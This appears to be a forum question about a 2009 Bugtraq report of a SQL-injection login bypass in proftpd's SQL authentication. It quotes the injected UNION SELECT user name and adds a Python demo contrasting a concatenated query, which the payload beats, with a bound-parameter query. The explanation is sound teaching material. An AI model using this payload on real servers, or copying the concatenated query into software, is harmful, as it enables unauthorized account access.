An article posted to Bugtraq says that it is possible to log in to proftpd using SQL injection.
Is something like this really possible...?
http://seclists.org/bugtraq/2009/Feb/0084.html
>Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if you login with username like:
>USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
>and a password of "1" (without quotes).
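To see why the quoted user name pairs with the password "1", here is an added example (not from the Bugtraq post and not proftpd's code) that runs it against a constructed SQLite table, once through a string-built query and once through a bound parameter. The query shape, the table contents and the plaintext password check are assumptions made for illustration; proftpd's own escaping logic is not reproduced.

```python
import sqlite3

# User name quoted in the Bugtraq post above; the post pairs it with password "1".
POSTED_USER = "%') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --"

# Assumed column list and query shape (hypothetical, not proftpd's mod_sql statement).
COLS = "userid, passwd, uid, gid, homedir, shell"


def make_db():
    """Constructed sample table; column names follow the quoted payload."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (userid TEXT, passwd TEXT, uid INT,"
               " gid INT, homedir TEXT, shell TEXT)")
    db.execute("INSERT INTO users VALUES"
               " ('alice', 's3cret', 1001, 1001, '/home/alice', '/bin/sh')")
    return db


def lookup_concat(db, user):
    """Weak form: the user name becomes part of the SQL text."""
    sql = f"SELECT {COLS} FROM users WHERE (userid='{user}') LIMIT 1"
    return db.execute(sql).fetchone()


def lookup_bound(db, user):
    """Corrected form: the user name is only ever a bound value."""
    sql = f"SELECT {COLS} FROM users WHERE (userid=?) LIMIT 1"
    return db.execute(sql, (user,)).fetchone()


def login(lookup, db, user, password):
    """Return the account row if the stored password matches, else None.
    Plaintext comparison is a simplification for this example."""
    row = lookup(db, user)
    if row is not None and str(row[1]) == password:
        return row
    return None


if __name__ == "__main__":
    db = make_db()
    # The UNION branch supplies its own passwd column (1), so "1" matches.
    print("concatenated:", login(lookup_concat, db, POSTED_USER, "1"))
    # Bound as data, the same string is just a user name that does not exist.
    print("bound:       ", login(lookup_bound, db, POSTED_USER, "1"))
```
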